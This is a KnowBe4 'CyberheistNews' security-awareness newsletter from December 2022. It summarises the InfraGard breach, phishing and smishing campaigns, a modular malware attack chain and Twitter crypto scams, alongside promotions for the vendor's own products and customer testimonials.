CyberheistNews Vol 12 #51 | December 20th, 2022
[Ughh] The FBI’s Trusted Threat Sharing ‘InfraGard’ Network Was Hacked
Investigative reporter Brian Krebs reported December 13, 2022, that “InfraGard, a program run by the U.S. Federal Bureau of Investigation (FBI) to build cyber and physical threat information sharing partnerships with the private sector, this week saw its database of contact information on more than 80,000 members go up for sale on an English-language cybercrime forum.
“Meanwhile, the hackers responsible are communicating directly with members through the InfraGard portal online — using a new account under the assumed identity of a financial industry CEO that was vetted by the FBI itself.”
Here is some more from the Krebs post
“On Dec. 10, 2022, the relatively new cybercrime forum Breached featured a bombshell new sales thread: The user database for InfraGard, including names and contact information for tens of thousands of InfraGard members.
“The FBI’s InfraGard program is supposed to be a vetted Who’s Who of key people in private sector roles involving both cyber and physical security at companies that manage most of the nation’s critical infrastructures — including drinking water and power utilities, communications and financial services firms, transportation and manufacturing companies, healthcare providers, and nuclear energy firms.
“InfraGard connects critical infrastructure owners, operators, and stakeholders with the FBI to provide education, networking, and information-sharing on security threats and risks,” the FBI’s InfraGard fact sheet reads.
In response to information shared by KrebsOnSecurity, the FBI said it is aware of a potential false account associated with the InfraGard Portal and that it is actively looking into the matter.
“This is an ongoing situation, and we are not able to provide any additional information at this time,” the FBI said in a written statement.
KrebsOnSecurity contacted the seller of the InfraGard database, a Breached forum member who uses the handle “USDoD” and whose avatar is the seal of the U.S. Department of Defense.”
Blog post with links:
[New PhishER Feature] Turn the Tables on the Cybercriminals with PhishFlip
Cybercriminals are always coming up with new, devious phishing techniques to trick your users. PhishFlip is a new PhishER feature that allows you to respond in real time and turn the tables on these threat actors. With PhishFlip, you can now immediately “flip” a dangerous attack into an instant real-world training opportunity for your users.
Your users are likely already reporting potentially dangerous emails in some fashion within your organization. You can now combine your existing PhishRIP email quarantine capability with the new PhishFlip feature that automatically replaces active phishing threats with a new defanged look-alike back into your users’ mailbox.
The new PhishFlip feature is included in PhishER—yes you read that right, no extra cost— so now you can turn the tables on these threat actors and flip targeted phishing attacks into a simulated phishing test for all users. This new feature dramatically reduces data breach risk and the burden on your IT and InfoSec teams.
See how you can best manage your user-reported messages.
Join us TOMORROW, Wednesday, December 21, @ 2:00 PM (ET) for a live 30-minute demonstration of PhishER, the #1 Leader in the G2 Grid Report for SOAR Software. With PhishER you can:
- NEW! Automatically flip active phishing attacks into safe simulated phishing campaigns with PhishFlip. You can even replace active phishing emails with safe look-alikes in your user’s inbox.
- Easily search, find, and remove email threats with PhishRIP, PhishER’s email quarantine feature for Microsoft 365 and Google Workspace
- Cut through your Incident Response inbox noise and respond to the most dangerous threats more quickly
- Automate message prioritization by rules you set into one of three categories: Clean, Spam or Threat
- Easy integration with KnowBe4’s email add-in button, Phish Alert, or forwarding to a mailbox works too!
Find out how adding PhishER can be a huge time-saver for your Incident Response team!
Date/Time: TOMORROW, Wednesday, December 21, @ 2:00 PM (ET)
CISA Phishing Infographic Contains a Lot of Good Information
On December 8, the Cybersecurity & Infrastructure Security Agency (CISA) released a great phishing infographic about data collected, lessons learned and recommendations learned from simulated phishing attacks that CISA has done for organizations. It is a great, independent, unbiased infographic with a lot of good data and recommendations. If you and your organization follow the included recommendations, you will be better off.
Each finding and recommendation is linked with specific Cybersecurity Performance Goals (CPGs) from CISA’s larger 2022 Cross-Sector Cybersecurity Performance Goals. So, it is great to be able to go from an infographic recommendation to a more formal recommendation and report, all created by the U.S. government’s largest agency dedicated to protecting people and organizations against cyberthreats.
Here are some of the key findings and some related sources for more information.
[CONTINUED] with lots of useful links at the KnowBe4 blog:
A Master Class on IT Security: Roger Grimes Teaches Ransomware Mitigation
Cybercriminals have become thoughtful about ransomware attacks; taking time to maximize your organization’s potential damage and their payoff. Protecting your network from this growing threat is more important than ever. And nobody knows this more than Roger A. Grimes, Data-Driven Defense Evangelist at KnowBe4.
With 30+ years of experience as a computer security consultant, instructor, and award-winning author, Roger has dedicated his life to making sure you’re prepared to defend against quickly-evolving IT security threats like ransomware.
Watch Roger in this thought-provoking, on-demand webinar to learn what you can do to prevent, detect, and mitigate ransomware.
In this session you’ll learn:
- How to detect ransomware programs, even those that are highly stealthy
- Official recommendations from the Cybersecurity & Infrastructure Security Agency (CISA)
- The policies, technical controls, and education you need to stop ransomware in its tracks
- Why a good backup (even offline backups) no longer save you from ransomware
You can learn how to identify and stop these attacks before they wreak havoc on your network.
New Modular Attack Chain Found That Allows Attackers to Change Payloads Mid-Breach
We’ve long known developers of cyberattacks to be crafty and focus a lot of energy on obfuscation, but a new attack can shift gears midstream, delivering just the right malware.
If you travel enough by plane, eventually you have a really good idea of what can go wrong while enroute and plan accordingly to pack the right things you may need (e.g., battery pack, charging cable, pillow, headphones, etc.). It’s just human nature – you know the outcome you want, are aware of the variables, and take actions proactively to ensure as positive an outcome as possible.
A new attack identified by security analysts at HP Wolf Security, denoted in their Q3 Threat Insight Report highlights a very sophisticated attack that feels a bit like these attackers have been through this before and have taken precaution to be able to change the focus of an attack based on what they encounter in a victim organization.
According to the report, the attack starts with a simple malicious Word doc, but quickly turns into a complex mix of PowerShell scripts designed to facilitate the downloading of components from different remote web servers used throughout the campaign, allowing attackers to change out payloads easily mid-campaign or even mid-attack.
This modular approach empowers initial access brokers to use the same attack strategy, but install a RAT for one client, ransomware for another, and Cobalt Strike Beacon for yet another. This is dangerous territory, when threat actors have “options.” It’s all the more reason we need to make sure that their initial attack – a Word doc sent as an attachment – is never opened; something taught to users through frequent security awareness training.
Can You Be Spoofed?
Are you aware that one of the first things hackers try is to see if they can spoof the email address of someone in your own domain?
Now they can launch a “CEO fraud” spear phishing attack on your organization, and that type of attack is very hard to defend against, unless your users are highly “security awareness” trained.
KnowBe4 can help you find out if this is the case with our free Domain Spoof Test. It’s quick, easy and often a shocking discovery.
Find out now if your email server is configured correctly, many are not!
- This is a simple, non-intrusive “pass/fail” test.
- We will send a spoofed email “from you to you”.
- If it makes it through into your inbox, you know you have a problem.
- You’ll know within 48 hours!
Try to Spoof Me!
Let’s stay safe out there.
Stu Sjouwerman, SACP
Founder and CEO
PS: [SCARY] Effective, fast, and unrecoverable: Wiper malware is popping up everywhere:
PPS: [What Is CaaS?] 6 IBM cybersecurity predictions for 2023: Ransomware and CaaS will spike:
Quotes of the Week
“If there is to be reconciliation, first there must be truth.”
– Timothy B. Tyson – American Author
“Logic will get you from A to B. Imagination will take you everywhere.”
– Albert Einstein – Physicist
You can read CyberheistNews online at our Blog
Utility Bill Phishbait
An SMS phishing (smishing) campaign is impersonating utility providers in the U.S., Cybernews reports. Researchers at Enea AdaptiveMobile Security spotted the campaign, which informs recipients of offers to save money. The text messages contain offers related to gas prices, electricity bills, concert tickets, car insurance policies.
If a user clicks the link, they’ll be taken to a website designed to steal their personal and financial information. “[T]hese attackers know their target’s weak spot, and have constructed a special, ‘too good to miss’ offer to hook the victim,” the researchers write. “Once the user has opened the URL in the message and engages with the website, the risk of information theft is imminent. This could mean the user’s Social Security Number, or their credit/debit card PIN, for example.”
Cybernews has the story:
Another Deceptive Advance Fee Twitter Scam
Scammers continue to take advantage of headlines surrounding Elon Musk’s acquisition of Twitter. Researchers at Trend Micro have observed a new scam circulating on Twitter, in which attackers use fake tweets from Musk to push crypto scams. The phony tweets state, “I decided to randomly choose 1000 of my new followers, who can participate to the latest crypto giveaway.”
“Twitter and new owner Elon Musk have been everywhere in the news lately — and scammers have been using the trending publicity to push more crypto-related scams via Twitter,” Trend Micro says. “The latest is the ‘Freedom Giveaway’ scam.
“Twitter users who follow Elon Musk (and related accounts like Tesla and SpaceX) are the target. Would-be victims are added to a ‘Deal of the Year’ list that randomly targets users, with links to malicious websites that are supposedly offering great deals and giveaways.”
These types of scams are easy to recognize once you know what to look for. New-school security awareness training can give your employees a healthy sense of suspicion so they can avoid falling for these types of scams.
Trend Micro has the story:
What KnowBe4 Customers Say
Found this in my inbox, unsolicited:
“Mr. Sjouwerman, I wanted to congratulate you on having such a fantastic employee, Megan K., at KnowBe4. A couple weeks ago Megan helped me through some processes. She had just taken over for our previous account rep.
“Megan was very knowledgeable, accommodating, and friendly. She answered all of my questions and was a pleasure to speak with. I look forward to her upbeat attitude, and friendly spirit next time I speak with her. I wanted to let you know.”
– S.J., Systems Administrator
“Good morning and happy Friday, Stu! I appreciate you reaching out to see how we’re doing so far. Our rollout of KnowBe4 has been smooth to start! Our representative, Brandon O., has been extremely helpful with our setup and always answers our questions with valuable information.
“Something that I thought was extremely helpful was the security policy template provided in the ASAP section of the web portal. It saved a lot of time to review it and make tweaks rather than creating a whole new one from scratch.
“Both HR and our Safety & Security teams liked how thorough it was. PS, I still reached out to Brandon to confirm it was you before responding, ha-ha. It’s not often you get to correspond with the founder and CEO of the service you’re using! Thank you for reaching out.”
– M.W., IT Coordinator
The 10 Interesting News Items This Week
Cyberheist ‘Fave’ Links